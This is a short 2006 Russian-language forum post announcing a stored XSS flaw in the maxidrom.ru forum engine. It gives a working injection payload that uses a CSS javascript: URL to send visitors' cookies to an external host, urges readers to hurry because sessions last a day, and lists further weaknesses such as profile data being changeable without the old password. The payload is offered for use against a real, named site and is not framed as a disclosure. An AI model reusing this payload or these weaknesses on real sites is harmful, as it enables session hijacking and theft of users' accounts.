
30.05.2006, 01:23
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме: 4839935
Репутация:
1202
|
|
maxidrom.ru/forum/ активная XSS
Обнаружена активная хсс в движке Максидрома. Нет проверки спаренных ВВ-тегов:
PHP код:
re@re.com ' style='background:url(javascript:document.images.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)'
В опере не пашет, в FF не проверял.
Время сессии - сутки. Торопитесь =]
Пара коментов:
- отутствеует всякая проверка на регистрацию
- отсутствует ретрив пароля на мыло(если забыл - твои проблемы)
- можно сменить ЛЮБЫЕ данные в профиле БЕЗ ввода старого пароля, для смены пароля нужно знать старый
Последний раз редактировалось Elekt; 30.05.2006 в 01:25..
|
|
|